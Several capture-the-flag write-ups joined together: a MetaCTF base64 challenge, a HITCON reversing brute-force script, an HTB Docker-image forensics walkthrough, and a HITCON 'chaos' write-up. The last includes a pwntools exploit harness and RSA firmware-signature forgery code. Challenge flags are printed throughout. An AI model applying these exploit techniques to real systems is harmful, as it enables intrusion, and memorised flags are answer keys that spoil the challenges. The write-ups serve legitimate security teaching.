1-4.95-4.95l2.5-2.5a3.5 3.5 0 0 1 4.95 0 .751.751 0 0 1-.018 1.042.751.751 0 0 1-1.042.018 1.998 1.998 0 0 0-2.83 0l-2.5 2.5a1.998 1.998 0 0 0 0 2.83Z"></path></svg>Description:</h3><blockquote>On a red team engagement, you discover a text file on an administrator’s desktop with all of their passwords - you now have the keys to the kingdom!</blockquote>During the engagement debrief, you explain what you found and how you were able to access so many systems. The administrator says that's impossible, because they encrypted all of the passwords in the file.Here’s an example of one of their “encrypted” passwords: TWV0YUNURntlbmNvZGluZ19pc19OMFRfdGhlX3NhbWVfYXNfZW5jcnlwdGlvbiEhfQ==See if you’re able to recover the Administrator's password.<h1 dir="auto"><svg class="octicon octicon-link" viewBox="0 0 16 16" version="1.1" width="16" height="16" aria-hidden="true"><path d="m7.775 3.275 1.25-1.25a3.5 3.5 0 1 1 4.95 4.95l-2.5 2.5a3.5 3.5 0 0 1-4.95 0 .751.751 0 0 1 .018-1.042.751.751 0 0 1 1.042-.018 1.998 1.998 0 0 0 2.83 0l2.5-2.5a2.002 2.002 0 0 0-2.83-2.83l-1.25 1.25a.751.751 0 0 1-1.042-.018.751.751 0 0 1-.018-1.042Zm-4.69 9.64a1.998 1.998 0 0 0 2.83 0l1.25-1.25a.751.751 0 0 1 1.042.018.751.751 0 0 1 .018 1.042l-1.25 1.25a3.5 3.5 0 1 1-4.95-4.95l2.5-2.5a3.5 3.5 0 0 1 4.95 0 .751.751 0 0 1-.018 1.042.751.751 0 0 1-1.042.018 1.998 1.998 0 0 0-2.83 0l-2.5 2.5a1.998 1.998 0 0 0 0 2.83Z"></path></svg>Procedure:</h1>The == at the tail of the encrypted text we intializied that it's a base64 cioher lets decode<div class="snippet-clipboard-content notranslate position-relative overflow-auto" data-snippet-clipboard-copy-content="root@kali~$ TWV0YUNURntlbmNvZGluZ19pc19OMFRfdGhlX3NhbWVfYXNfZW5jcnlwdGlvbiEhfQ== | base64 ">root@kali~$ TWV0YUNURntlbmNvZGluZ19pc19OMFRfdGhlX3NhbWVfYXNfZW5jcnlwdGlvbiEhfQ== | base64 </div><h1 dir="auto"><svg class="octicon octicon-link" viewBox="0 0 16 16" version="1.1" width="16" height="16" aria-hidden="true"><path d="m7.775 3.275 1.25-1.25a3.5 3.5 0 1 1 4.95 4.95l-2.5 2.5a3.5 3.5 0 0 1-4.95 0 .751.751 0 0 1 .018-1.042.751.751 0 0 1 1.042-.018 1.998 1.998 0 0 0 2.83 0l2.5-2.5a2.002 2.002 0 0 0-2.83-2.83l-1.25 1.25a.751.751 0 0 1-1.042-.018.751.751 0 0 1-.018-1.042Zm-4.69 9.64a1.998 1.998 0 0 0 2.83 0l1.25-1.25a.751.751 0 0 1 1.042.018.751.751 0 0 1 .018 1.042l-1.25 1.25a3.5 3.5 0 1 1-4.95-4.95l2.5-2.5a3.5 3.5 0 0 1 4.95 0 .751.751 0 0 1-.018 1.042.751.751 0 0 1-1.042.018 1.998 1.998 0 0 0-2.83 0l-2.5 2.5a1.998 1.998 0 0 0 0 2.83Z"></path></svg>Flag:</h1><div class="snippet-clipboard-content notranslate position-relative overflow-auto" data-snippet-clipboard-copy-content="MetaCTF{encoding_is_N0T_the_same_as_encryption!!}">MetaCTF{encoding_is_N0T_the_same_as_encryption!!}</div></article> </div>
On a red team engagement, you discover a text file on an administrator’s desktop with all of their passwords - you now have the keys to the kingdom!
During the engagement debrief, you explain what you found and how you were able to access so many systems. The administrator says that's impossible, because they encrypted all of the passwords in the file.
Here’s an example of one of their “encrypted” passwords: TWV0YUNURntlbmNvZGluZ19pc19OMFRfdGhlX3NhbWVfYXNfZW5jcnlwdGlvbiEhfQ==
See if you’re able to recover the Administrator's password.
The == at the tail of the encrypted text we intializied that it's a base64 cioher lets decode
</div>
</readme-toc>
<details class="details-reset details-overlay details-overlay-dark" id="jumpto-line-details-dialog"> <summary data-hotkey="l" aria-label="Jump to line"></summary> <details-dialog class="Box Box--overlay d-flex flex-column anim-fade-in fast linejump overflow-hidden" aria-label="Jump to line"> </option></form><form class="js-jump-to-line-form Box-body d-flex" data-turbo="false" action="" accept-charset="UTF-8" method="get"> <input class="form-control flex-auto mr-3 linejump-input js-jump-to-line-field" type="text" placeholder="Jump to line…" aria-label="Jump to line" autofocus> <button data-close-dialog="" type="submit" data-view-component="true" class="btn"> Go</button></form> </details-dialog> </details>
</div>
</div>
</div>
</turbo-frame>
</main> </div>
</div>
<footer class="footer width-full container-xl p-responsive" role="contentinfo"> <h2 class='sr-only'>Footer</h2>
<div class="position-relative d-flex flex-items-center pb-2 f6 color-fg-muted border-top color-border-muted flex-column-reverse flex-lg-row flex-wrap flex-lg-nowrap mt-6 pt-6"> <div class="list-style-none d-flex flex-wrap col-0 col-lg-2 flex-justify-start flex-lg-justify-between mb-2 mb-lg-0"> <div class="mt-2 mt-lg-0 d-flex flex-items-center"> <svg aria-hidden="true" height="24" viewBox="0 0 16 16" version="1.1" width="24" data-view-component="true" class="octicon octicon-mark-github"> <path d="M8 0c4.42 0 8 3.58 8 8a8.013 8.013 0 0 1-5.45 7.59c-.4.08-.55-.17-.55-.38 0-.27.01-1.13.01-2.2 0-.75-.25-1.23-.54-1.48 1.78-.2 3.65-.88 3.65-3.95 0-.88-.31-1.59-.82-2.15.08-.2.36-1.02-.08-2.12 0 0-.67-.22-2.2.82-.64-.18-1.32-.27-2-.27-.68 0-1.36.09-2 .27-1.53-1.03-2.2-.82-2.2-.82-.44 1.1-.16 1.92-.08 2.12-.51.56-.82 1.28-.82 2.15 0 3.06 1.86 3.75 3.64 3.95-.23.2-.44.55-.51 1.07-.46.21-1.61.55-2.33-.66-.15-.24-.6-.83-1.23-.82-.67.01-.27.38.01.53.34.19.73.9.82 1.13.16.45.68 1.31 2.69.94 0 .67.01 1.3.01 1.49 0 .21-.15.45-.55.38A7.995 7.995 0 0 1 0 8c0-4.42 3.58-8 8-8Z"></path></svg> <span> © 2023 GitHub, Inc. </span> </div> </div>
<nav aria-label='footer' class="col-12 col-lg-8"> <h3 class='sr-only' id='sr-footer-heading'>Footer navigation</h3> Terms Privacy Security Status Docs Contact GitHub Pricing API Training Blog About </nav> </div>
<div class="d-flex flex-justify-center pb-6"> <span></span> </div></footer>
<div id="ajax-error-message" class="ajax-error-message flash flash-error" hidden> <svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-alert"> <path d="M6.457 1.047c.659-1.234 2.427-1.234 3.086 0l6.082 11.378A1.75 1.75 0 0 1 14.082 15H1.918a1.75 1.75 0 0 1-1.543-2.575Zm1.763.707a.25.25 0 0 0-.44 0L1.698 13.132a.25.25 0 0 0 .22.368h12.164a.25.25 0 0 0 .22-.368Zm.53 3.996v2.5a.75.75 0 0 1-1.5 0v-2.5a.75.75 0 0 1 1.5 0ZM9 11a1 1 0 1 1-2 0 1 1 0 0 1 2 0Z"></path></svg> <button type="button" class="flash-close js-ajax-error-dismiss" aria-label="Dismiss error"> <svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-x"> <path d="M3.72 3.72a.75.75 0 0 1 1.06 0L8 6.94l3.22-3.22a.749.749 0 0 1 1.275.326.749.749 0 0 1-.215.734L9.06 8l3.22 3.22a.749.749 0 0 1-.326 1.275.749.749 0 0 1-.734-.215L8 9.06l-3.22 3.22a.751.751 0 0 1-1.042-.018.751.751 0 0 1-.018-1.042L6.94 8 3.72 4.78a.75.75 0 0 1 0-1.06Z"></path></svg> </button> You can’t perform that action at this time. </div>
<div class="js-stale-session-flash flash flash-warn flash-banner" hidden > <svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-alert"> <path d="M6.457 1.047c.659-1.234 2.427-1.234 3.086 0l6.082 11.378A1.75 1.75 0 0 1 14.082 15H1.918a1.75 1.75 0 0 1-1.543-2.575Zm1.763.707a.25.25 0 0 0-.44 0L1.698 13.132a.25.25 0 0 0 .22.368h12.164a.25.25 0 0 0 .22-.368Zm.53 3.996v2.5a.75.75 0 0 1-1.5 0v-2.5a.75.75 0 0 1 1.5 0ZM9 11a1 1 0 1 1-2 0 1 1 0 0 1 2 0Z"></path></svg> <span>You signed in with another tab or window. Reload to refresh your session.</span> <span>You signed out in another tab or window. Reload to refresh your session.</span> </div> <template id="site-details-dialog"> <details class="details-reset details-overlay details-overlay-dark lh-default color-fg-default hx_rsm" open> <summary role="button" aria-label="Close dialog"></summary> <details-dialog class="Box Box--overlay d-flex flex-column anim-fade-in fast hx_rsm-dialog hx_rsm-modal"> <button class="Box-btn-octicon m-0 btn-octicon position-absolute right-0 top-0" type="button" aria-label="Close dialog" data-close-dialog> <svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-x"> <path d="M3.72 3.72a.75.75 0 0 1 1.06 0L8 6.94l3.22-3.22a.749.749 0 0 1 1.275.326.749.749 0 0 1-.215.734L9.06 8l3.22 3.22a.749.749 0 0 1-.326 1.275.749.749 0 0 1-.734-.215L8 9.06l-3.22 3.22a.751.751 0 0 1-1.042-.018.751.751 0 0 1-.018-1.042L6.94 8 3.72 4.78a.75.75 0 0 1 0-1.06Z"></path></svg> </button> <div class="octocat-spinner my-6 js-details-dialog-spinner"></div> </details-dialog> </details></template>
<div class="Popover js-hovercard-content position-absolute" style="display: none; outline: none;" tabindex="0"> <div class="Popover-message Popover-message--bottom-left Popover-message--large Box color-shadow-large" style="width:360px;"> </div></div>
<template id="snippet-clipboard-copy-button"> <div class="zeroclipboard-container position-absolute right-0 top-0"> <clipboard-copy aria-label="Copy" class="ClipboardButton btn js-clipboard-copy m-2 p-0 tooltipped-no-delay" data-copy-feedback="Copied!" data-tooltip-direction="w"> <svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-copy js-clipboard-copy-icon m-2"> <path d="M0 6.75C0 5.784.784 5 1.75 5h1.5a.75.75 0 0 1 0 1.5h-1.5a.25.25 0 0 0-.25.25v7.5c0 .138.112.25.25.25h7.5a.25.25 0 0 0 .25-.25v-1.5a.75.75 0 0 1 1.5 0v1.5A1.75 1.75 0 0 1 9.25 16h-7.5A1.75 1.75 0 0 1 0 14.25Z"></path><path d="M5 1.75C5 .784 5.784 0 6.75 0h7.5C15.216 0 16 .784 16 1.75v7.5A1.75 1.75 0 0 1 14.25 11h-7.5A1.75 1.75 0 0 1 5 9.25Zm1.75-.25a.25.25 0 0 0-.25.25v7.5c0 .138.112.25.25.25h7.5a.25.25 0 0 0 .25-.25v-7.5a.25.25 0 0 0-.25-.25Z"></path></svg> <svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-check js-clipboard-check-icon color-fg-success d-none m-2"> <path d="M13.78 4.22a.75.75 0 0 1 0 1.06l-7.25 7.25a.75.75 0 0 1-1.06 0L2.22 9.28a.751.751 0 0 1 .018-1.042.751.751 0 0 1 1.042-.018L6 10.94l6.72-6.72a.75.75 0 0 1 1.06 0Z"></path></svg> </clipboard-copy> </div></template>
</div>
<div id="js-global-screen-reader-notice" class="sr-only" aria-live="polite" ></div> </body></html>
|
It reads the input flag from R08 at 60B4, then XOR it to 0x17f, loads R09 from somewhere in memory, adds the XOR result to 0(which was another memory), and finally stored the result to R09.
0x17f is a number from a table created by initialize function.
Fortunately, it didn’t change by modifying the input data. So, we can save them by setting a breakpoint on 60BA where the program wants to XOR input data with the key to collect them.
After we dumped it, we had to find the correct sequence of data. 60E4 was the first comparison routine, then 60FB, and so.What I did was fix the content of the memory before each comparison.
After collecting the correct data, I wrote a python script to bruteforce the flag, so after some correction, I got the flag:```key = [ 0x17f, 0x183, 0x193, 0x60, 0x4a, 0x1f6, 0xbc, 0xe, 0x103, 0x12f, 0x1d3, 0x1e1, 0xa3, 0x130, 0x15a, 0x175, 0x7, 0x162, 0x159, 0x129, 0x93, 0x1be, 0xcc, 0x16b, 0x2, 0x22, 0x27 ] dat = [ 0x117, 0x101, 0x0e8, 0x0eb, 0x110, 0x0a8, 0x16f, 0x1a7, 0x10e, 0x02d, 0x1e2, 0x166, 0x1fa, 0x103, 0x03f, 0x186, 0x1bc, 0x111, 0x071, 0x189, 0x02d, 0x1b8, 0x060, 0x16f, 0x1d2, 0x031, 0x05e ] flag = 'h'for idx, c in enumerate(key): for c in "abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789+_-{}": if (((ord(c) ^ key[idx]) + dat[idx-1]) & 0b111111111) == dat[idx]: flag += cprint flag #hitcon{6d0fe79f2179175dda}``` |
After reading through a lot of the discussion in the discord, it seems like people pulled down the image and went searching for a needle in a haystack. While this works, I would like to take this time to highlight my favorite Docker reversing tool, [dive](https://github.com/wagoodman/dive).
Dive is a neat tool that lets you see all of the changes made to an image layer by layer. This can help expedite the process of reversing because you get a list of things that were done to the image, and are able to view those changes in the file system of the image. You still have to navigate to the overlay directory on your machine to get the file, but this has saved me a lot of time during CTFs in the past.
I'll switch over to my Remnux machine to show exactly how it's done. We're already given the name of the image, so we can just load that onto our machine.```bashremnux@remnux:~/ctf/htb_uni/forensics_peel_back_layers$ docker pull steammaintainer/gearrepairimageUsing default tag: latestlatest: Pulling from steammaintainer/gearrepairimage7b1a6ab2e44d: Pull complete 858929a69ddb: Pull complete 97239c492e4d: Pull complete Digest: sha256:10d7e659f8d2bc2abcc4ef52d6d7caf026d0881efcffe016e120a65b26a87e7bStatus: Downloaded newer image for steammaintainer/gearrepairimage:latestdocker.io/steammaintainer/gearrepairimage:latest```
For people that don't understand, the `steammaintainer/gearrepairimage` refers to the name of a docker repository, which is similar to a git repository in many ways. Simply put, docker repository are supposed to store and provide docker images, along with elements of version control with those images. The `docker pull` command is, in a sense, similar to the `git clone` command.
We can now check the status of our image with `docker images`.```bashremnux@remnux:~/ctf/htb_uni/forensics_peel_back_layers$ docker imagesREPOSITORY TAG IMAGE ID CREATED SIZEsteammaintainer/gearrepairimage latest 47f41629f1cf 9 days ago 72.8MB```
Now that the image is up, we can load it into dive by using the image ID, and start using the tool.```bashremnux@remnux:~/ctf/htb_uni/forensics_peel_back_layers$ sudo dive 47f41629f1cf```
This is what `dive` looks like.
A brief explanation of what you're seeing:- The top left window labeled **Layers** shows the layers and stages that make up the image. You can navigate through these using the arrow keys.- The window to the right labeled **Current Layer Contents** shows you exactly what the file system looks like at that layer. `dive` also tries to color code what files have changed or were added.- The window to the left called **Layer Details** tells you exactly what commands were executed in the Dockerfile, a file that sets up the image on launch, for that layer
If we look at the second layer, we notice the following entry in "Layer Details".```d#(nop) COPY file:0b1afae23b8f468ed1b0570b72d4855f0a24f2a63388c5c077938dbfdeda945c in /usr/share/lib/librs.so```
This seems to be the only lead at this time. We can locate this file in the "Current Layer Contents".
We can access the file by entering the image at that layer and going from there, but I find it easiest to go to `/var/lib/docker/overlay2`.```bashroot@remnux:/var/lib/docker/overlay2# ls -latotal 24drwx--x--- 6 root root 4096 Nov 22 11:20 .drwx--x--- 13 root root 4096 Nov 22 11:20 ..drwx--x--- 3 root root 4096 Nov 22 11:20 2d4dd1a91c123d2099cb70cba5b4312c92b724babdf35dcdb864beee914e0ca0drwx--x--- 4 root root 4096 Nov 22 11:26 45e6bf07a22d7ce25c287cf9828868893e36983898de96d800c412463964c869drwx--x--- 4 root root 4096 Nov 22 11:26 c9272024e3fffe4dc145973237870c8a8aecf8689392daf21b6719ad24ca7401drwx------ 2 root root 4096 Nov 22 11:20 l```
We've already done the work of finding the file that looks out of place, so we just have to navigate the relevant layer folder and grab the file (alternatively, run a quick find command and work from there). I'll copy this shared object file to my working directory from earlier, and do my go-to move of running `strings` on the file. We find the flag almost immediately, just have to do some cleaning up.```bashremnux@remnux:~/ctf/htb_uni/forensics_peel_back_layers$ strings librs.so __gmon_start___ITM_deregisterTMCloneTable_ITM_registerTMCloneTable__cxa_finalizeforkgetenvatoiinet_addrhtonssocketconnectwritedup2execvelibc.so.6GLIBC_2.2.5u/UHHTB{1_r3H4lly_l1kH3_st34mpHunk_r0b0Hts!!!}...[trim]...```
**FLAG:** `HTB{1_r34lly_l1k3_st34mpunk_r0b0ts!!!}`
Some further analysis in ghidra shows us that the flag was hard coded in hex across 4 lines, so that's why it looks the way it does.
Although we've already found the flag, we probably don't want a random image still running on our system, so we can run `docker image rm IMAGE_ID`, after exiting `dive`, to remove the image. |
# Chaos
**Authors**: [Nspace](https://twitter.com/_MatteoRizzo), [gallileo](https://twitter.com/galli_leo_)
**Tags**: pwn, crypto, kernel, sandbox, heap
**Points**: 334 + 421 + 450
> Let's introduce our brand new device for this cryptocurrency era - CHAOS the CryptograpHy AcceleratOr Silicon!> > Remote Env: Ubuntu 20.04> > `nc 52.197.161.60 3154`> > [chaos-7e0d17f7553a86831ec6f1a5aba6bdb8cfab5674.tar.gz](https://hitcon-2021-quals.s3.ap-northeast-1.amazonaws.com/chaos-7e0d17f7553a86831ec6f1a5aba6bdb8cfab5674.tar.gz)
## Introduction
Last week we played HITCON CTF 2021, one of the hardest events of the year, and placed 4th. During the CTF we (Nspace and gallileo) spent most of our time working on the chaos series of challenges written by [david942j](https://twitter.com/david942j) and lyc. This writeup explains the structure of the challenges and discusses how we solved each of the 3 stages. Out of nearly 300 teams in the CTF, we were the only team to solve all 3 challenges, and the first team to solve chaos-kernel and chaos-sandbox.
Let's get started!
## Challenge architecture
This series of challenges simulates a custom hardware cryptographic accelerator attached to a Linux computer. The setup is fairly complex and has a lot of moving parts:
* A modified QEMU with a custom CHAOS PCI device. The virtual PCI device lets the guest interact with the emulated CHAOS chip. * A Linux VM running inside QEMU. The VM loads a driver for the CHAOS chip, called `chaos.ko`, into the kernel. Userspace programs can talk to CHAOS through the driver.* A userspace CHAOS client that uses CHAOS to perform cryptographic operations.* A firmware binary that runs on the emulated CHAOS chip.* A sandbox binary that emulates the CHAOS chip and runs the firmware.
The following image shows an overview all the components and how they interact.
There are 3 challenges in the series, each with a different flag:
* chaos-firmware (10 solves, 334 points): the flag is in a file outside the VM (`flag_fiwmare`).* chaos-kernel (3 solves, 421 points): the flag is in a file inside the VM that only root can read.* chaos-sandbox (2 solves, 450 points): the flag is in a file outside the VM (`flag_sandbox`).
### CHAOS virtual device
CHAOS is a virtual cryptographic accelerator attached to the PCI bus of the virtual machine. It exposes 2 PCI memory resources to the VM: a MMIO area with 16 registers (`csrs`), and 1 MB of dedicated on-chip memory (`dram`). The VM can interact with CHAOS by reading and writing to these two memory regions and CHAOS can send interrupts to the VM. The implementation is split in 3 parts: a virtual PCI device in QEMU, a sandbox binary, and some firmware that runs on the virtual chip.
The PCI device in QEMU doesn't do much. At startup it allocates space for the two memory regions using `memfd` and launches the sandbox binary. The QEMU process and the sandbox share the two memfds and two eventfds used to signal interrupts. After startup, the virtual PCI device is only used to send interrupts to the VM or the sandbox and to handle the VM's memory accesses.
### CHAOS sandbox
The sandbox does the actual chip emulation, so it's more interesting. At startup it mmaps the two shared memory areas, opens two flag files (`flag_firmware` and `flag_sandbox`), and waits until the VM sends it the firmware. Once the VM sends the firmware, the sandbox validates it, forks, and runs the firmware in the child process. The sandbox ptraces the firmware process and uses `PTRACE_SYSEMU` to intercept all the system calls made by the firmware. The firmware's system calls are not handled by the kernel, but by the sandbox. This lets the sandbox implement a custom syscall interface for the firmware, and prevents the firmware from directly accessing files or other system resources.
The sandbox implements only a few system calls:
* `exit` stops the firmware and sends the exit code back to the VM. The sandbox restarts the firmware on the next memory access from the VM.* `add_key` and `delete_key` add and remove cryptographic keys supplied by the firmware to the sandbox's key storage.* `do_crypto` performs a cryptographic operation on data supplied by the firmware and returns the result to the firmware.* `get_flag` reads `flag_firmware` into the chip's memory.
### CHAOS firmware
The firmware is a flat x86_64 binary, which runs in a child process of the sandbox. Since it runs under ptrace with `PTRACE_SYSEMU`, it cannot directly make system calls to the kernel, but must do so through the sandbox. The firmware is not executed with `execve`, but simply loaded in memory and jumped to. It executes in a copy of the sandbox's memory space, so it has direct access to the MMIO area and the CHAOS device memory.The challenge has an example firmware, but also lets us provide our own firmware, which can be an arbitrary binary up to 10 kB in size. The sandbox will refuse to load a firmware image unless it passes a RSA signature check.
### CHAOS driver
`chaos.ko` is a Linux kernel-mode driver that interfaces with the virtual CHAOS chip over PCI. It is responsible for managing the CHAOS chip's memory, loading the firmware, servicing interrupts, and providing userspace programs with an interface to the CHAOS chip. The userspace interface uses a misc character device (`/dev/chaos`) and exposes two IOCTLs:
* ALLOC_BUFFER allocates a buffer of a given size in the CHAOS chip's memory. This can only be done once per open file. After calling this ioctl the client can access the buffer by mmapping the file descriptor.* DO_REQUEST sends a request to perform a cryptographic operation to the CHAOS chip, waits for the request to complete, and then returns.
The chip side of the interface uses two ring buffers: a command queue and response queue. The command queue contains request descriptors, which specify what operation CHAOS should perform. Each request descriptor contains a pointer to the input data in the CHAOS memory, the size of the data, an opcode, and a request ID. The response queue contains response descriptors (request ID and status code). After enqueuing a new request, the driver signals a mailbox in the CHAOS MMIO area, which makes the sandbox run the firmware, and the blocks.
When the firmware returns, the virtual PCI device raises an interrupt, which processes the request, then wakes up the request threads. When a blocked request thread sees that the chip completed its request, it unblocks and returns the result to userspace.
### CHAOS client
The last piece is the client, a regular Linux binary which runs in userspace in the VM. The client can interact with CHAOS through the interface exposed by the driver at `/dev/chaos`. Just like with the firmware, the challenge provides an example client, but also lets us use our own which can be an arbitrary binary up to 1 MB in size. Unlike the firmware, the client doesn't have to pass a signature check. The client runs as an unprivileged user, so it cannot read the flag inside the VM.
## Preparation
Since the challenge setup is quite complex with a lot of moving parts, we wanted to reduce the complexity and make debugging easier. Since Part 1 and Part 3 can ignore the kernel module and QEMU for the most part, we wrote a script to launch the sandbox binary standalone.
The setup is quite simple, we create the memfds and eventfds in python, then use `pwntools` to spawn the sandbox process. We also have some utility functions for "interacting" with the memory regions. The script shown below already uses part of the solution for Part 1. It also already contains more "advanced" firmware features we added for Part 3, being an output buffer so we can use `printf` inside the firmware.
```python#!/usr/bin/env python# -*- coding: utf-8 -*-from pwn import *# for type info in vscodefrom pwnlib.tubes.process import processfrom pwnlib import gdb, contextfrom pwnlib.elf import ELFfrom ctypes import *import osimport memfdfrom pwn import *from hashlib import sha256from math import prodfrom skein import threefishimport twofish
def memfd_create(name, flags): return memfd.memfd_create(name, flags)
# whateverlibc = cdll.LoadLibrary("libc.so.6") def eventfd(init_val, flags): return libc.eventfd(init_val, flags)
# Set up pwntools for the correct architectureexe = context.binary = ELF('sandbox')
# SETUP LOCAL ENVcsr_fd = memfd_create("dev-csr", 0)log.info("csr_fd: %d", csr_fd)os.truncate(csr_fd, 0x80)dram_fd = memfd_create("dev-dram", 0)log.info("dram_fd: %d", dram_fd)os.truncate(dram_fd, 0x100000)evtfd_to_dev = eventfd(0, 0)log.info("evtfd_to_dev: %d", evtfd_to_dev)evtfd_from_dev = eventfd(0, 0)
def preexec(): # WARNING: using log.* stuff inside the preexec functions can cause hangs, no idea why # log.info("Before executing, setting up the filedescriptors") os.dup2(csr_fd, 3) os.dup2(dram_fd, 4) os.dup2(evtfd_to_dev, 5) os.dup2(evtfd_from_dev, 6) # log.info("Finished with duplicating filedesc")
def wait_for_interrupt(): log.debug("Waiting for interrupt from device") res = os.read(evtfd_from_dev, 8) log.debug("Got 0x%x", u64(res)) return res
def send_interrupt(val = 1): log.debug("Sending interrupt with val 0x%x", val) os.write(evtfd_to_dev, p64(val))
def write_mem(fd, off, val: bytes): log.debug("Writing to %d @ 0x%x: %s", fd, off, hexdump(val)) os.lseek(fd, off, os.SEEK_SET) os.write(fd, val)
def write_mem_64(fd, off, val: int): write_mem(fd, off, p64(val))
def read_mem(fd, off, size) -> bytes: log.debug("Reading from %d @ 0x%x", fd, off) os.lseek(fd, off, os.SEEK_SET) return os.read(fd, size)
def read_mem_64(fd, off) -> int: res = read_mem(fd, off, 8) return u64(res)
def load_firmware(data, dram_off = 0): log.info("Loading firmware of size 0x%x, dram @ 0x%x", len(data), dram_off) # mapping firmware directly at beginning of dram, hopefully that's ok lmao write_mem(dram_fd, dram_off, data) write_mem_64(csr_fd, 0, dram_off) write_mem_64(csr_fd, 8, len(data)) send_interrupt() res = wait_for_interrupt() int_val = u64(res) log.info("Got interrupt: 0x%x", int_val) # should be > 0x1336 load_res = read_mem_64(csr_fd, 0) log.info("Got result for loading: 0x%x", load_res)
def build_firmware(shellcode): header = p32(len(shellcode)) header += p8(0x82) header += bytes.fromhex("0fff0ee945bd4176f55a40543b3666843a0d565c339e5d8969fcd7ca921cc303a1c8af16240c4d032d1931632b90996dd48aebacee307d3c57bc83375698ae7df90d10163edee9e067ce46e738092257dafb15b80fb65961900deffa9b59b57e472bf56be0d9f648ad6908f2553be13a9ea0cda24317756cba5142a95e21f9e000040000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000")
factors = [13, 691267, 20502125755394762434933579089125449307897345968084091731229436353808955447773787435286551243437724264561546459801643475331591701959705793105612360650011316069145033629055595572330904990306691542449400499839249687299626423918040370229280752606812185791663127069532707770334540305571214081730144598191170073 ] phi=prod([i-1 for i in factors]) dec=pow(0x10001,-1,phi) act = int.from_bytes(sha256(shellcode).digest(), "little") header += int.to_bytes(pow(act, dec, prod(factors)), 256, 'little') return header + shellcode
OUT_OFF = 0x50000
def read_outputbuf(): ret = b"" off = OUT_OFF while True: curr = read_mem(dram_fd, off, 1) if curr == b"\0": break ret += curr off += 1 return ret
def start(argv=[], *a, **kw): '''Start the exploit against the target.''' p = process([exe.path] + argv, *a, **kw) if args.GDB: gdb.attach(p, gdbscript=gdbscript) return p
# Specify your GDB script here for debugging# GDB will be launched if the exploit is run via e.g.# ./exploit.py GDBgdbscript = '''continue'''.format(**locals())
#===========================================================# EXPLOIT GOES HERE#===========================================================# Arch: amd64-64-little# RELRO: Full RELRO# Stack: Canary found# NX: NX enabled# PIE: PIE enabled
io = start(preexec_fn=preexec, close_fds=False)
# to allow attachingif args.PAUSE: pause()
DRAM_START = 0x10000000
# sh = shellcraft.syscall(0xC89FC, arg0=DRAM_START + 0x1000)# sh += shellcraft.syscall(60, 0)
# asm_sh = asm(sh)
import subprocess
subprocess.check_call(['make'])firm = read("./firmware")# firm = build_firmware(asm_sh)load_firmware(firm)
log.info("Firmware read ok => launching firmware now!")send_interrupt()
wait_for_interrupt()# pause()log.info("Got interrupt, firmware is done now!")
output = read_outputbuf()
log.info("Output buffer of firmware is:\n%s", hexdump(output))
log.info("As string:\n%s", output.decode("ascii", errors='ignore'))
io.interactive()```
## Part 1: Firmware
The firmware can request the flag for this challenge from thesandbox by using the `get_flag` syscall, and then write it to the CHAOS memory where our client in userspace can read it. Unfortunately the provided firmware never uses this system call, so there is no way to get the flag without either pwning the firmware from userspace or creating our own firmware that gets the flag and passes the RSA signature check. Since the challenge is in both the crypto and the pwn category and we can supply our own firmware, we tried to look for a way to bypass the signature check. This is the function that validates the firmware:
```cstruct firmware_header { uint32_t size; uint8_t key_size; uint8_t key[255]; uint8_t signature[256]; uint8_t data[];};
static const uint8_t pubkey[] = { /*...*/ };
void load_firmware(void){ uint32_t firmware_offset; // esi uint32_t firmware_size; // eax firmware_header *firmware; // rbx unsigned int key_size; // er14 buffer *p_result; // rcx buffer *p_firm_sha; // rax buffer *v7; // rdx unsigned int size; // ebp unsigned int signature_size; // ebx uint8_t *sha_data; // r12 uint8_t *x; // rax int rsa_e; // [rsp+Ch] [rbp-29Ch] BYREF buffer firm_data; // [rsp+10h] [rbp-298h] BYREF buffer firm_sha; // [rsp+20h] [rbp-288h] BYREF buffer n; // [rsp+30h] [rbp-278h] BYREF buffer signature; // [rsp+40h] [rbp-268h] BYREF buffer e; // [rsp+50h] [rbp-258h] BYREF buffer result; // [rsp+60h] [rbp-248h] BYREF firmware_header header; // [rsp+70h] [rbp-238h] BYREF
firmware_offset = csr[0]; firmware_size = csr[1];
// Size/bounds checks if (firmware_size <= 0x204) { csr[0] = -22; return; }
firmware = &dram_file.data[firmware_offset]; memcpy(&header, firmware, sizeof(header)); if (header.size + sizeof(header) != firmware_size || header.size > firmware_data.size ) { csr[0] = -22; return; }
make_buffer(&firm_data, firmware->data, header.size); calc_sha256(&firm_sha, &firm_data);
// Check the public key that signed the firmware. key_size = header.key_size; make_buffer(&n, firmware->key, header.key_size); if (memcmp(n.data, pubkey, 128)) { csr[0] = -129; return; }
make_buffer(&signature, firmware->signature, key_size);
// Verify the signature. rsa_e = 0x10001; make_buffer(&e, &rsa_e, 4); do_rsa_encrypt(&result, &n, &e, &signature);
p_result = &result; p_firm_sha = &firm_sha; while (1) { size = p_firm_sha->size; signature_size = p_result->size; if ( size >= signature_size ) break; v7 = p_firm_sha; p_firm_sha = p_result; p_result = v7; }
sha_data = p_firm_sha->data; if (!memcmp(sha_data, p_result->data, signature_size)) { x = &sha_data[signature_size]; while (size > signature_size) { if (*x++) { goto fail; } ++signature_size; }
// Firmware valid memcpy(firmware_data.data, firm_data.data, firm_data.size); csr[0] = 0x8000000000000000LL; return; }
fail: csr[0] = -74;}```
The firmware verifies only the first 128 bytes of N, but N can be up to 255 bytes long, with the size controlled by us. Furthermore, there are no checks that N is actually a product of two primes. This means that we can sign the firmware with our own RSA key as long as the first 128 bytes of the modulus match the key accepted by the sandbox.
